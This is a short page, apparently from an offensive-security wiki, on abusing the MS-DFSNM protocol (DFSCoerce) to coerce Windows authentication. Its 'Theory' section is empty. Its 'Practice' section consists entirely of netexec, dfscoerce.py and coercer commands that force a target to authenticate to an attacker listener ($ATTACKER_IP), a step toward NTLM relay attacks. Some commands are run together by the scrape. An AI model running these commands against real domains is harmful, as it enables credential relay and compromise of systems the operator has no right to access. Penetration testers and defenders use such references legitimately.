MS-DFSNM abuse (DFSCoerce)
Theory
Practice
netexec smb <TARGET> -u <USER> -p <PASSWORD> -M dfscoercedfscoerce.py -d "domain" -u "user" -p "password" LISTENER TARGET# Coerce
coercer coerce -u $USER -p $PASSWORD -d $DOMAIN --filter-protocol-name MS-DFSNM -l $ATTACKER_IP -t $TARGET_IP
# Coerce a specific method
coercer coerce -u $USER -p $PASSWORD -d $DOMAIN --filter-method-name NetrDfsRemoveStdRoot -l $ATTACKER_IP -t $TARGET_IPResources
Last updated